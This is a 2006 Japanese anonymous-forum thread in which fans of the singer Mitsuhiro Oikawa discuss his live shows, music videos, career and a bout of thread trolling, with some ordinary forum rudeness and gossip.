続・欲望図鑑発売記念の握手会の翌日だったな、確か。

398 :NO MUSIC NO NAME:2006/08/29(火) 00:22:36 ID:28K7be1G
>394
美輪さんとのトークイベント(初めての対面)は1999年11月。
ココロノヤミ発売は2002年。

399 :NO MUSIC NO NAME:2006/08/29(火) 01:12:58 ID:sY5y17UC
親しくなるのに少し期間あったような...

400 :398:2006/08/29(火) 01:48:34 ID:28K7be1G
訂正。
ココロノヤミ発売は2001年8月でした。

401 :NO MUSIC NO NAME:2006/08/29(火) 01:49:13 ID:6qMWFHIH
ちょっと新参が質問しにきましたよ
この方はライブでは岡村靖幸氏のステージングを参考にしていると語ってる模様ですが
ズバリ、ライブで観客にパンツ見せたり服脱いだりみたいなパフォーマンスはあるんですか

402 :NO MUSIC NO NAME:2006/08/29(火) 01:51:06 ID:j01QwPpW
>>401
現在は参考にしていません。
ヤク中の懲役男の真似をどうしたら出来るのかと・・・

403 :NO MUSIC NO NAME:2006/08/29(火) 01:56:32 ID:6qMWFHIH
親切にどーも!^^

404 :NO MUSIC NO NAME:2006/08/29(火) 02:12:00 ID:h3kvVORx
(岡村ちゃんとはまったく関係ないと思うが)
いっぺんだけ(?)パンツ見せたことあったよね。
それがよりによってTVでオンエアされた。。。orz
(確か最初のアダルト・オンリー?)
割とビミョンなパンツだったので、見てもあまり喜べなかった記憶が・・・

405 :NO MUSIC NO NAME:2006/08/29(火) 02:20:49 ID:8zbOLMGv
そんな放送あったっけ?何て番組で?

406 :NO MUSIC NO NAME:2006/08/29(火) 02:38:56 ID:f62ek57P
どの局かまでは覚えてないが、ワイドショーで流れた。

407 :NO MUSIC NO NAME:2006/08/29(火) 06:41:48 ID:cf9ypYCo
>>404
ナツカシス

408 :NO MUSIC NO NAME:2006/08/29(火) 06:43:37 ID:8zbOLMGv
なんだワイドショーか
でどんなパンツだったの?

409 :NO MUSIC NO NAME:2006/08/29(火) 08:03:17 ID:KR4YfK9N
いつものシャツと同じ系とか?

410 :NO MUSIC NO NAME:2006/08/29(火) 09:39:20 ID:ri4Eq835
ココロノヤミ生でききたいな〜

411 :NO MUSIC NO NAME:2006/08/29(火) 10:13:09 ID:/gqjkW2Y
武道館で歌って欲しかったなぁ

412 :NO MUSIC NO NAME:2006/08/29(火) 10:58:39 ID:sY5y17UC
DVD見て武道館はココロノヤミなくていいと思った

413 :NO MUSIC NO NAME:2006/08/29(火) 13:38:52 ID:cf9ypYCo
>>408
確か暗いモスグリーンでちょっと光沢というか艶のあるピタッとした感じのやつ。
ボトムのおしり側をちょっと下げてチラっと見せてただけだからよくわからんが
ビキニタイプっぽかったよ。

414 :NO MUSIC NO NAME:2006/08/29(火) 17:07:58 ID:6qMWFHIH
>>413
もろ岡村だわ

415 :NO MUSIC NO NAME:2006/08/29(火) 19:55:34 ID:3rIbmW8x
ココロノヤミPVで最後につぅーっと綺麗に涙を流すところ、ミチの女優魂を感じて好きだw

416 :NO MUSIC NO NAME:2006/08/29(火) 22:47:26 ID:Quw1xOgQ
美輪さんとミチーが初めて会ったトークショー自由席で運良く2列目に
座れたんだけど、歌のとき美輪さんの地声が聞こえてすごい鳥肌がたった。
ミチーのときはたたなかったんだけどねぇ…

>>391
ライブアンケートにファンお気に入りの歌ランキングをやって
上位の曲だけを歌うライブもしてくれ〜と書いてみた。





417 :NO MUSIC NO NAME:2006/08/30(水) 22:29:03 ID:DVcOljAs
>>413
あまりセクシーな感じの見せ方じゃなかったという記憶がある…
ちょっと下げてチラ、どころではなく両手でペロンってw  一瞬だけど。

418 :NO MUSIC NO NAME:2006/08/30(水) 22:36:25 ID:btQ64Mk6
そのシーン、私もワイドショーで見た。
色気も何もなかったよね。
酔っ払いの悪ふざけって感じだったような気がする。

419 :NO MUSIC NO NAME:2006/08/31(木) 02:00:05 ID:FF/3rFSV
413だけど417-418の言うこと凄いわかる。
「酔っぱらっちゃってるし見せちゃえ〜!(ペロン)」
って感じだったよねw

420 :NO MUSIC NO NAME:2006/09/01(金) 14:04:17 ID:qPpXjxzK
買った当初はさっぱり聞かなかったノクタンを近頃よく聞くようになったよ
でもカバー曲はやっぱりとばすことが多いかな…
「TWO OF US」を聞くとなんかとても優しい気分になれる
ミチーが作詞作曲した曲がやっぱり好きだ〜

421 :NO MUSIC NO NAME:2006/09/03(日) 03:21:19 ID:MMaYTi0J
あっちの方今行ってみたらかなり回っててびっくりしたよ
何があったと言うんだ読むの怖ひ

422 :NO MUSIC NO NAME:2006/09/03(日) 06:28:00 ID:UWO7KINp
――――――――――――――
ミッチーさんてベイベ好きなの?
__  __ .r――――――――
    ∨   |まさかぁ、ただの金づるだよ
日 凸 U | ______
≡≡≡≡≡| /〃∧_∧  / ̄ ̄ ̄ ̄ ̄
 U ∩ [] ∨%(´∀` ) <ですよねぇー
__ ∧ ∧__∧_∧___)_  \_____
  (   ,,)日(    .)∇
― /   | ― (     )―――
\(__.ノ    ━┳━)
 ━┳━   └ ┃―・゛
 ̄ ┻  ̄ ̄ ̄ ┻ ̄ ̄ ̄ ̄

423 :NO MUSIC NO NAME:2006/09/03(日) 08:16:37 ID:9KjRpir8
>421
ひとりおかしいのがいて、みんなまじめに答えてたけど
そのうちそれが無駄なことだと気づき始めたら暴れだした。
だから全く読まなくていいよ。

424 :NO MUSIC NO NAME:2006/09/03(日) 12:55:51 ID:uYqxU6Z+
>>423
本人乙


プププ

425 :NO MUSIC NO NAME:2006/09/03(日) 13:18:40 ID:MMaYTi0J
>>423
了解。

426 :NO MUSIC NO NAME:2006/09/04(月) 06:22:51 ID:Mkl0Lk3n
ミッチー王子こと及川光博が、新曲「Winding Road」(10月4日発売)で
TBS系人気アニメ枠の新番組「天保異聞 妖奇士(あやかしあやし)」(10月7日スタート、土曜後6時)のエンディング曲を歌うことが分かった。

同放送枠は、これまで「機動戦士ガンダム」シリーズ、「BLOOD+」などが放送され、“月9”ならぬ“土6”の通称で呼ばれる人気枠

427 :NO MUSIC NO NAME:2006/09/04(月) 07:25:49 ID:ikdvARNL
>426
ツマンネ

428 :NO MUSIC NO NAME:2006/09/04(月) 16:44:47 ID:SVAd5oBv
あっちがひどい事になってるね
次スレの時期だけど立てても同じ事になりそう…
落ち着くまで立てずにこっちを使ったらどうかな
こっちまで来なきゃいいけど…


429 :NO MUSIC NO NAME:2006/09/04(月) 16:51:14 ID:jm0d5F0V
>>428
そう言いながら誘ってるよな、おまい

430 :NO MUSIC NO NAME:2006/09/04(月) 16:58:19 ID:Nxgeet/l
>>428
おまいが犯人だろ?
同じことあっちにも書きやがって

431 :NO MUSIC NO NAME:2006/09/04(月) 17:05:34 ID:ssZlSCI4
>>429-430

432 :NO MUSIC NO NAME:2006/09/04(月) 17:05:45 ID:wNoyJKpQ
>>429>>430
そうかもね。こちらはIDが出る分、好都合だが。

433 :NO MUSIC NO NAME:2006/09/04(月) 17:07:03 ID:zgkdi+Dr
>>429>>430
やめなよ。コピペだらけなんだから誰の仕業かなんかわからない。
いくらなんでもそのうち飽きるでしょ。
自分は降って湧いたコピペAA嵐より本物のおかしい人の方が怖いよ。

434 :NO MUSIC NO NAME:2006/09/04(月) 17:09:32 ID:O7zMa4TQ
>>433
一番おかしいのはオマエだろw

435 :NO MUSIC NO NAME:2006/09/04(月) 17:13:47 ID:iOdx/qvZ
もちつけ!

436 :NO MUSIC NO NAME:2006/09/04(月) 17:44:45 ID:5A3Iqtgg
>>434
こんなときに仲間割れしてどうすんのさ…。


裸部の待受けのバラかじってる写真
ちょっと暗いけど萌え

437 :NO MUSIC NO NAME:2006/09/04(月) 18:58:28 ID:ZEsK/iYd
おっ仕事組が帰ってきたかな?お疲れ様。
これから仕事なのであとはお任せします。

438 :NO MUSIC NO NAME:2006/09/04(月) 18:59:16 ID:O0jT4RoL
これからが本格的にコピペ爆撃開始の悪感。

439 :NO MUSIC NO NAME:2006/09/04(月) 18:59:53 ID:AtoM6biu
うん…今次スレ立ちゃうと確実に荒されそうだよね…

440 :NO MUSIC NO NAME:2006/09/04(月) 19:00:36 ID:IihDCqbH
クローン‥のクランクインが11月に変更されてるね

441 :NO MUSIC NO NAME:2006/09/04(月) 19:01:23 ID:wk7PpP6i
噂板じゃなくていっそID出る板にしてみるのは?
IDであぼんできて便利だよ。
男性歌手ソロはID出たっけ・・・


442 :NO MUSIC NO NAME:2006/09/04(月) 19:05:37 ID:q7L7OIQ5
>>440 あ、そうね。キャスティングのせいかな?
完成が2月20日と日が指定されてる(2月下旬、のような表現でなくて)
のも不思議だ。

443 :NO MUSIC NO NAME:2006/09/04(月) 19:12:44 ID:yQgDILvU
>>441
だったらあちこちに乱立させるより
現在の邦板でいいのでは。

444 :NO MUSIC NO NAME:2006/09/04(月) 19:13:31 ID:P46cD6vd
2/20まで映画で、何日かリハ、25日あたりからツアーなんじゃ?

445 :NO MUSIC NO NAME:2006/09/04(月) 19:26:34 ID:NUIMqqBH
映画の場合、完成というのは編集も含めてではないかな?
撮影はずっと前に終わると思う。

446 :NO MUSIC NO NAME:2006/09/04(月) 19:27:25 ID:HrfpDPB2
プロデューサーが「IZO」や「フルメタル極道」とか、
三池監督がらみの人なんだよね。
同じ単館上映でも、アート系というよりOV系な感じ。
ちょっとそこらへんがビミョーだわ。

447 :NO MUSIC NO NAME:2006/09/04(月) 19:56:36 ID:q7L7OIQ5
>441
無駄。邦楽板を見てみ。

448 :NO MUSIC NO NAME:2006/09/04(月) 19:57:37 ID:uxT9NKWX
じゃあ、次スレはIPでるシベリアでw

449 :NO MUSIC NO NAME:2006/09/04(月) 22:12:53 ID:9xpWx5Z1
ながれ同じだなw
ザマーミロ
及川なんか(゚听)イラネ 

450 :NO MUSIC NO NAME:2006/09/06(水) 02:21:38 ID:NRaVbcVE
なーんか微妙になんだかな。


====糸冬   了====

====再    開====


話題に上っていたので及川光博のDVD、「及川光博の世界」を購入した。
だが。だ。
中には「ホレこれでも見てろ」的なけちなリーフレット一枚ペローン・・・・
東芝EMIなんかあったのか?
他のCDとか全部買えって勢いですか?

451 :NO MUSIC NO NAME:2006/09/06(水) 02:57:21 ID:rQbggRsH
ミッチー、ハードスケジュールが続いてそうですね。体には気をつけてね。

452 :NO MUSIC NO NAME:2006/09/06(水) 03:26:58 ID:E23nvoTc
>>450
もともととくにリーフレットは凝ってなかったですから。
それに東芝EMI的にはもう移籍したミュージシャンにとくに思いもないでしょう。
それでも移籍後もよくしてくれた会社だと思うけど。
愛芸ボックスしかり、この前の「光」しかり。

で、肝心の中身はどうでした?どのPVがお好み?

453 :NO MUSIC NO NAME:2006/09/06(水) 21:11:44 ID:S2I46GgU
  
       ∧_∧      ∧_∧     ∧_∧
      ( ・∀・)     (. ・∀・)    ( ・∀・.)
     (;;"~゛;;;~゛;; )))  (;;"~゛;;;~゛;; )))  (;;"~゛;;;~゛;; )))
     . ミ;,,_,,;ミ,_,,;ミ    .ミ;,,_,,;ミ,_,,;ミ    .ミ;,,_,,;ミ,_,,;ミ

454 :NO MUSIC NO NAME:2006/09/06(水) 21:57:13 ID:TOC5k6m8
東芝EMIやワーナー時代は良かったなぁ。
喝采は…どうにかならんものかねぇ。

455 :NO MUSIC NO NAME:2006/09/06(水) 22:25:10 ID:q8iN1bQd
>>452 そうですか・・あんなもんでしたか。
期待してました正直。部屋に飾れるような何かが入ってると思ったら、
すんごい小さい写真だけっておい!!!ってなったけど、
東芝は色々と良くしてくれてるとは思う。

昨日あれからPV見たんだけど、
一番出来が良いのはやっぱり舞台や服飾にこだわった
三日月姫じゃないかなと思う。

よく見たら、監督とかいつも決まってるわけじゃなくて、
意思の疎通とか大変だっただろうなとか思った。

奇をてらって、人を出し抜いて欺く・・そして踊るベイベを尻目にほくそえんでいる>良い意味で
それって凄い自己演出だと思うし、イマジネーションの結実だと思う。
山登りに行って、「頂上はまだー?」とか聞いて「もう少しだよ」
って、何度もはぐらかされるような感じがした。
特に若い頃の及川光博は、可愛く美しいだけでなく、ある種の毒を含んでいて、
影的なものもあって魅力的だった。セックルアピールもゆんゆんで。
そういう意味で、僕のゼリーって言うのを見てからレッツ・ダンスとか見ると、
意味深長に思える。

ただ、音楽の完成度としてはイマイチな気がします。
及川光博自体何か楽器が出来るとかそういうニュアンスが伝わっては来なかった。
PVは及川光博自体が魅力的で良いけど、曲自体は、人の手が加わりすぎの
きらいがあるように感じました。最近及川さんは、新譜出しませんね。
EMI離れたら、良いプロデューサーやスタ・ミュージシャンから離れてしまったから?
それとも音楽からは足を・・・・?

456 :NO MUSIC NO NAME:2006/09/06(水) 23:00:51 ID:xvxmmjmL
ミチーの楽曲に、ある意味での「完成度」を求めるなら
ライブ映像を見る(もしくはライブCDを聞く)のをおすすめします。
生でこそ、という部分がこんなにも強いアーティストって
非常に特異な存在だとは思うけど…
なんともPVやCDだけでは真の魅力が100%伝わりにくいので。
ミチーの本領は、やっぱり生(なま)にあり!です。

457 :NO MUSIC NO NAME:2006/09/06(水) 23:18:47 ID:q8iN1bQd
そうですか・・・なんか気が引けてしまいます。
生も良いけど、映像とかに加工されつくしたPVなどの音楽が好きです自分は。
生を否定はしないけど、自分は、ね。

なんか、この「及川光博の世界」って、年がランダムだから、
並べ替えしてみたら、
少しトーンダウンする時期があったようですね。
何があったんだろう。

及川光博ヘヴィ・フリークでない私が、色々生意気言ってすみません、
私は主に洋楽のPVを網羅している人間で、
邦楽のPVでこれだけの魅せるPVや画になる人物は、
及川光博以外にこの日本には魅力的な人物は居ない。

これは大変ユニークで、大事な稀有の存在とオモワレ

458 :NO MUSIC NO NAME:2006/09/07(木) 00:02:34 ID:vmGXQm4W
正直、ファンからみても最近のPVは自信を持ってオススメできる作品がないと思います。
少なくとも私は。
CDの完成度もあまり高いとは言えないでしょう。
でも>>456さんの言うとおり、生で観るミチーはすごいです。

PVが好きなあなたにも、敢えて、生で観て頂きたい。
せっかく、及川光博に興味を持っていただけたのなら、
映像で切り取られたり、CDでパッケージングされたりしていない、
純度100%の及川光博を、ぜひ、感じ取ってください。
舞台での彼は、むちゃくちゃ画になりますよ。

459 :NO MUSIC NO NAME:2006/09/07(木) 00:20:48 ID:PGWo4Wll
>>457 いきなり生ライブは気が引ける?というのもわかります。
ライブ盤CDやライブDVD、レンタルでもいいので
ちょっと試してみてくださいな。

460 :NO MUSIC NO NAME:2006/09/07(木) 03:01:01 ID:RChA2uOl
>>458-459 その熱意にシャッポを脱ぎます。

CDをヴォカールキャンセルして聞くと、音楽が浮きまくりますね。
やっぱり、及川光博というアーティストは、
あの容貌と、声と、全体の雰囲気をして、歌が成り立っている事を
実感しました。
総合芸術といったところでしょうか?
舞台とか衣装も手がけているみたいだし、正直言えば生見てみたいですね。

表でガンガンキャピりまくって、モラリティや僕のゼリー、あるいは
ココロノヤミで、内部のネガティヴで毒のある歌を聴かせて、
謂わば「ケムに巻く」ようなやり方、及川さんの深淵と文字通り
心の闇を具間見せることで、魅力を増大させる効果があると思います。

霧の中でに男を見ると、どんな男もグッド・ルッキング・ガイに見える手法が
有るけれど、及川光博は、本物の好い男だから、その振り幅は大きくなると
思います。確かにあの人は麗人。男はどんなに嫉妬するだろうか。
そのせいで、思うような仕事が出来ていないんではなかろうか?

及川光博の、及川光博による総合芸術に触れることは、結構なラリだと思う。
もっと聴かせて欲しい。そして良いPVも期待する。
今年デヴュー10周年らしいけど、俳優や雑誌、ラジオ、様々なメディアで、
どれだけ多くの仕事をこなしてきたんだろう。どれだけ多くの人格やキャラクター
を演じて・・・そしてどれだけ多くのファンの心を掴んで煙に巻き、遠くから
手招きしてきたんだろう。真の好い男のやり方。
雲をつかむような、あのもどかしさと夢。


461 :NO MUSIC NO NAME:2006/09/07(木) 15:23:01 ID:EAloVCFF
なんか凄い熱いな

462 :NO MUSIC NO NAME:2006/09/07(木) 19:37:40 ID:8Nd7ZIGH
シャッポ

463 :NO MUSIC NO NAME:2006/09/07(木) 22:51:00 ID:D4WFQlEU
>>460
そうそう総合芸術。
プロデューサーだから構成から舞台美術、衣装、照明(みちーのライブの照明はホントに綺麗)、
曲のアレンジ、踊りまですべてにアイデアを出す。
もちろん一人じゃなくてそれぞれの道のプロと作り上げてる。

「及川光博の世界」見たなら魔宮の聖戦(SDR)見たよね?
ぜひ今年6月に10周年記念でやった「日本舞踏館」DVDを見てほしいな。
ミチーがアーティストとしてどう変わってきたかわかってもらえると思うから。

だけど、
>どれだけ多くのファンの心を
というほどにはミチーは世間でいうところの売れっ子ちゃんになったことはないよ。
逆にあんまりセールス的には売れてないから、いろいろ大変だったりするみたいです。

464 :NO MUSIC NO NAME:2006/09/07(木) 23:09:40 ID:ADO31OFq
>>463さん
セールス的にはきついかも知れませんが、あの秘密結社のような
怪しげな雰囲気は、素晴らしい。良い意味で一流には出来ない、
偉業だと思います。
一流は誰が見ても素晴らしく完成されたもの。でも二流三流の素晴らしさは、
隠れたことによる魅惑、、あの週刊誌の袋とじの魅惑のようなものがあって、
私はそんなところに価値を見出します。それは誰にでも分りえる価値観ではなく、
その人を心からリスペクトしたという証であると思うから。
マイノリティやアノニマスであることは、ある種のエクスタシーであると思う。
そこでだ。
セールスが上手く行かないなら、インディーズで良いんじゃないかな。
もう本人分ってる気がするけど。なんか最近では及川さんは、俳優業が多く、
歌が。パフォーマンスを駆使した露出が少なくなった気がする
それは寂しい。もっと新しい音楽が聞きたいです。

明日は満月。しかも皆既月食です。
その前夜、思い切って。ファンレターを書いてみました。葉書だけど。
読まないだろうけど。



465 :NO MUSIC NO NAME:2006/09/07(木) 23:23:13 ID:t0Ssu4aw
あれ、部分月食じゃなかったっけ。
皆既は来年と新聞にあった
スレ違い&話の腰折ってスマソ
ファンレターは読んでくれてるそうですよ。

466 :NO MUSIC NO NAME:2006/09/07(木) 23:33:41 ID:D4WFQlEU
>>464
ファンレター喜ぶよー。なによりの好物だっていつも言ってるから。
以前、ミチー自身もインディーズでもかまわないようなこといったこともあった。
今はもうメジャーもインディーズも境界はないしね。
実際、今も半分インディーズみたいなもん。所属事務所が立ち上げたレーベルだし。
新しい音楽ききたいね。自分もききたい。
ミチーはどんどん大人になって優しくなっちゃって、音楽も尖らなくなった。
その包み込まれるような感じも嫌いじゃないけど、もっと刺激的なのがほしい。
でも新しい会報でも「ベイベより飽きっぽいからまた新しい音楽つくるよ」って言ってくれてる。
だからそれまでは期待しておとなしく待ってようと思う。

467 :NO MUSIC NO NAME:2006/09/07(木) 23:51:49 ID:PGWo4Wll
以下、チラ裏長文でスマソ(最初に謝っとく)

>>464
ミチーは間違いなく「一流」だよ。そういう意味では。
秘匿の魅惑、≒マイノリティーのエクスタシー、の域では収まらないところに
現在の彼のパフォーマンスの真骨頂は、在る。
(セールスや知名度、評価の大きさとは、全く別の次元の話です)
尖鋭として在ることの魅力や勢いとは、また別の段階(=ステージ)で
今のミチーは泳いでいるように、自分には見える。

現状、その場面には、あいにく生の公演でしか出遭うことができないのだけれど
そこには464が希求しているような、
「袋とじの魅力」を(奇跡的にも)有したままに、
誰にでも解り得るのではない魅力と、その真逆の魅力の交配の結果とも言えるような
知らない者には想像し難い、絶対無双の「パフォーマンスを駆使した」、
深遠な、光と闇を併せ持つアートの世界が、扉を開けて待っている。

とりあえずは、ライヴDVDをどうぞ つ◎ (マジ長チラごめん。つい464の熱意に誘われて)

468 :NO MUSIC NO NAME:2006/09/08(金) 00:34:21 ID:hk2FiR2N
みんな達者だなあ。感動した。

やっぱり理屈抜きでもライブ光博は凄いよ。何で凄いのか良く分からない位凄い

469 :NO MUSIC NO NAME:2006/09/08(金) 00:49:26 ID:Dwx2TGRP
>>464
失礼ですがおいくつなんですか?
30代以上の男性かと思って読んでたら女性のようだったので。

470 :NO MUSIC NO NAME:2006/09/08(金) 02:48:08 ID:sGX6dXST
>>459さん
私は僭越ながら女で、年は微妙なお年頃です。これ以上は勘弁して。
そして私はベイベというより、ハニーなので、ゆっくり流れる性質です。

>>466さん
早くリアルタイムの及川光博の曲が聞きたい。
いままでは浦島だったから。期待してる。
レターというより、落書きみたいになったけどそれも一興かなと。
まぁ。斜め読みしてくれれば良いかと。それでポイでも構わない。
何せ及川光博は走る人登る人と思うから。立ち止まらせてはいけない。

471 :NO MUSIC NO NAME:2006/09/08(金) 02:57:14 ID:8vUrI/Yg
>>470
最後の1行激しく同感です。
常にミチーは舳先が上を向いている。
そこがずっとファンで居られる理由かな、自分は。
立ち止まっていると感じることが、まず無くて
上向き加減の傾斜具合に、時々バラツキもあるけれど
あの昇り方の天井知らずな感じには、いつも感銘と驚愕を感じる。
一体何処まで行くんだこの人は。
だからこそ目を離さずついていきたい気持ちにさせられる。

472 :NO MUSIC NO NAME:2006/09/08(金) 03:09:03 ID:sGX6dXST
>>467さん
そうですね、確かにあの熱狂を見ると一流だ。でも。
歌手としての及川光博は、影の一流としておきたい気持ちがあるのは、
独占欲が強いからか?
評価というのは、熱狂する「喜び組み」がするものであって、その熱を、
コモンセンスとして共有できる人間にしか分かりえず、ある種のフェティシズムに
通じるものがあるとは言えないか。
それがXTC。まさしく狂乱の精神を私たちに植え付け、個々の中にマルティプライズ
させうる能力が、彼にはある。

ある一点の光が、寒天の培養器の中で増殖し、やがてコロニーを作る。
コロニーと化したその光はベイベたちのあのマスゲームに似たアクションを生む。
あのような動員をして熱狂せしめる人物は及川光博において他には
残念ながらこの日本においては居ないと。私は思う。

>>468さんのように「何で凄いのかよく分からない位凄い」と幻惑させるのは、
まさに及川光博の総合芸術に溺れる瞬間に、意識が違う世界へと誘う
からであろうと思う。そこにあるのは想念。そしてエクトプラズム。
ライヴで何が凄いか分からないほどになるのは、アーティストとの
崇高なシンクロニシティを味わうからであると思う。
同じベクトルとハイトを持ったシンクロニシティ。

ある日。
死んでしまった私の心を一種の麻薬のように。熱を枯渇させ、
美の渦に少しだけ足を踏み入れた感がある。

美の権化。及川光博に、ありがとうと言いたい。



473 :NO MUSIC NO NAME:2006/09/08(金) 03:18:09 ID:sGX6dXST
>>471さん
マストの帆に風を巻かせて、船を進ませるようなそんな感じで、
ベイベたちが、風を巻き起こせばいい。
舵を取るのは及川光博キャプテン。
目を離したが最後。
それはあらぬ方向へ行ってしまい、それが見つからないとなると、
そこは人間の心情だ。
追いたくなるのが常である。
掴めそうで掴めない何か。水の屈折で何があるか分らない。手探りの
ファンタスティック・ボヤージュだと思う。
旅にでる。行き先の無い、あるときは荒唐無稽な場所とポーズで写真に
収まるけど、たちまち色あせてしまう。だがそこに、かつての心のざわめきを
起こせば、また自由に動き回る。皆のブレーンゲームみたいに。

ベイベ達。風を起こし、連れてってもらいな

474 :NO MUSIC NO NAME:2006/09/08(金) 03:27:18 ID:sGX6dXST
すまない。ageてしまった。訂正できないのが空しい。

ひどくロマンティックな感じになってしまう。
畜生!!!
こんなはずじゃなかった。
及川光博を見る前は非常に殺伐とし、この荒涼の心に。
一つ。
植え込まれた何かが確かに存在する。
甚だ不快で快適。不快は時に快を生む。
例えば蛇。胸糞が悪いのに何度も見てしまう。
これは私の個人的な要素がプロットとなってつながりあう感じだから。

ベイベは、真っ直ぐついて行くんだよ?
私は斜め。

475 :NO MUSIC NO NAME:2006/09/08(金) 03:37:35 ID:sGX6dXST
酔ってなんか。そしてすべからく貴方も。

476 :NO MUSIC NO NAME:2006/09/08(金) 04:59:09 ID:+A7yYSWP
>>470のラスト一行と>>471に強く強く同意。

2ちゃん上で時折、彼の表現(時にパーソナリティも含めて)について、
「ミチー、変わっちゃったなぁ」という意見を目にするけれど、
変わる、という言葉は私個人的には少なからず違和感を感じてて。

この10年ずっとリアルタイムでミチーの表現に触れてきて、確固たるのはやっぱり
『不変(であり、普遍)の思想・信念』だなぁと強く痛感した。
私にとっては、変わらない部分の強さこそがミチーの成長の何よりの証であって、
その成長は、まさに>>470-471に書かれているように、ひとときと同じ場所に在らず
絶えず全力で上昇し続ける彼の表現活動スタンスと
それをやはり全力で追い続ける支持者の力(ラブパワーか?)の賜物なんじゃないかと。

10年前も今現在もそして未来も、ミチーも私達ファンもお互いの関係性も、
『変わる』恐怖に脅える事は何ひとつ無いと私は思うんだけど。
>>471タンが言うところの「上向き加減の傾斜具合のバラツキ」に
時にヒヤヒヤすることはあるかも知れないけど、
でもミチーなら絶対に大丈夫だと思う。
この先も逞しく頼もしく、不変かつ普遍の信念とアートを掲げて
ますます高みに昇ってくれると確信しているんですが。

477 :476:2006/09/08(金) 05:16:33 ID:+A7yYSWP
変化と成長は≠な訳で、ミチーの、この10年の血肉と魂を賭けた成長の跡を
容易く『変わっちゃった』と言う言葉で嘆くのは寂しいなぁと。

あの変わらない愛の深さと力強さこそが、ミチーの真随だと思うのでね。
その真随を死守するために、過去も現在も未来もずっと
ミチーは上昇し続けてくれる筈だ。うん。


なんか自分語りになっちゃったがかたじけない。

478 :NO MUSIC NO NAME:2006/09/08(金) 07:01:51 ID:8M9ZeL7f
昨日からのこのスレの熱さがたまらなく好きだ。
真っ赤に燃えさかるんじゃなくて、白い炎の熱さ。


10年を経て、彼の表現方法は変わってしまったかも
しれないけれど、軸となっているものは10年前と
何ら変わらず、見事なほどにブレがないと私は思う。

479 :NO MUSIC NO NAME:2006/09/08(金) 10:45:56 ID:8vUrI/Yg
真随は変わらない・ブレがないっていうの、解ります!
露出の仕方や活動の場・方法等に、表面的な変化はあるし、
世間的にも(ややもすればファンの間でも)そちらの変化に目が行って
剣呑に取り沙汰されることが、昨今多くなってるような気もしないはないけれど。
最も変わって欲しくない・それは捨てないでくれ!と思う核の部分、
表現者としての要(かなめ)の部分は、しっかりと揺るがない。
というかますます明確に屈強になっているから凄いと思う。

前に、インディーズ時代のライヴハウス映像を数曲見たんだけど
オーディエンスの煽り方、いじり方、
局地的な繊動を更なる流動につなげて
大きなムーブメントと熱狂の坩堝へとシフトさせる手腕と方法論は、
大ホールを満杯にしてやっている今の演り方とすっかり同じで
(良い意味で)まったく変わっていなくて、それに驚いた。

今では、その力を自分が目指す方向へと、より巧みに制御できるようになって
武道館みたいな大きい会場でミチーを観るのが楽しくてしょうがないのは、
それが理由かも。
ハコの広さを“遠さ”に感じさせることなく、
親密度の延長による“大きさ”“拡がり“として見せられるように操れる。
あれは凄いね。本当にいつもますます凄いなーって感動する。(昼間から長文スマソ)


480 :NO MUSIC NO NAME:2006/09/08(金) 22:06:45 ID:W2cDf+dl
みんな10年選手ですか・・・乙です。
私にはそんな気概・心意気はあるだろうか?無いな多分。

なんだか、私のレスは及川光博マンセーなレスばかりになってるから、
ここで自分自身に少し修正を加えるとすれば。
現代の伊達男及川光博発生前の、かつての日本於いて彼をして
伊達男という言葉が出来たというの独眼流正宗の言葉を借りればだ。
「礼に過ぐれば 諂いとなる」
私はその美しさや勇者の美を、賛美歌のように賛美し続けてきたが、
私が及川光博に触れる機会を与えたものは、武士の倅が、河原で
首切りの刑があれば武士の父親に見に行かされ、夜になれば
その晒し首に必ずや印をつけて帰って来い、さもなくばお前は。
武士の倅ではない、この家から出て行けといわれたという逸話に似た、
ある種の強迫観念が、美への渇望が、そうさせただけであり。

私は手放しで何かを賞賛し、持ち上げ。

媚 び 諂 う タイプ          
の人間ではない。

481 :NO MUSIC NO NAME:2006/09/08(金) 22:25:27 ID:W2cDf+dl
そんな私がだ。
ここにいる多くのベイベ、ファン暦の長い人と語るのは至極傲慢ではあると、
自分で自覚しながら、私は自分の今の存在意義として、及川光弘を、
語りたく思う。cold fire。冷たい炎。これはミックに旦那を寝取られた
アンジーの歌でもあるが。それはさておき。

変わってしまったと言うファンの言葉は、表向き大変中庸を得た言葉
であるとも思う。ほら。私が横目で雑誌やTVの露出で見る、及川光博の
姿は、ある時は王子ある時はカマ。ある時は・・様々であるから。
変わっていないと感じるのは。
ずっとあの人の信念を信じ理解し、寄り添ってきたからではあるまいか。
目を離さず。時を経ず。そうやって理解しようと、御幣はある表現になるが、
「同情」する事が出来たから、変わったものも変わっていない様に
思うのではないか。超高速の乗り物に乗って時間と空間を共有する。しかし。
周りと自分達の時間の流れ方は確実に違う。そういう種類のものではないか。

変わらぬ信念を持ちつつ、
自分を変えていけるのは、ブレイブ・アポロの成せる業。
本当にゆるぎないポリティック・ポリシーを内に秘め、自分を変える勇気こそ。
心の鍛錬を積み重ねた僧侶のような静かに微笑をたたえた強き姿だと推測する。
ちょっと見。誰からも理解されず、誰からも誤解され。誰からも評価されないかもしれない
その行為を、個性的なペーソスと一緒に自分の体を駆使して表現するその精神は、
及川光博の世界そのものを現すものであろうと思う。
いまだかつてそのような人物は居ただろうか?

482 :NO MUSIC NO NAME:2006/09/08(金) 22:43:02 ID:W2cDf+dl
感じるのは。
及川光博は、
ネイム・フェイム・フェイスを生まれ持って世にでるべくして
出て来た、パフォーマンス・パーソナリティである。
ネイム 及川光博・ミッチー・王子・殿下 
フェイム 名声、これからもっと強くもてるようになるもの
フェイス あの美しい顔と姿

どれが欠けていても、他の人物が成そうとしようとも、成せる業ではない、
「羞恥心」を伴なった、パフォーマンスとオーディエンスとのスタンス。
普通奇をてらったような行動や発言をすれば、
人は離れていく事がもっとも多く、ともすれば信頼をなくすことにもなる。
だが、及川光博に於いては、反対なのである。変化すればするほどその
個性やパフォーマンス・美的クオリティは増し、ファンは更に熱狂する。
そしてまた、彼は信頼を裏切らない。いつもいつも、小さなことからコツコツと。
一定のスタンスを取りながら、注意深く詳しく自分を知っている。
自分が他の男とどこが違うか。見た目はどうか。反応はどう返ってくるはずか。
自分を、詳細に分析する事でコアな。ブレの無い真髄を創る事が出来る。

それもあの人の才能。
天からの才能だろう。

もうこんな事は吐いて捨てるほど語りつくされただろうが。
10周年だ。
もう一度、どんな及川光博が好きでどんな人物なのか、熟考する事で
新しい彼を発見できるかもしれない。少しの失望と一緒に。

立ち止まったら。及川光博が進めなくなったら。
鳴かぬなら 殺してしまえ 郭公
自分の心から。及川光博を唾して追い出し。相殺することだ。
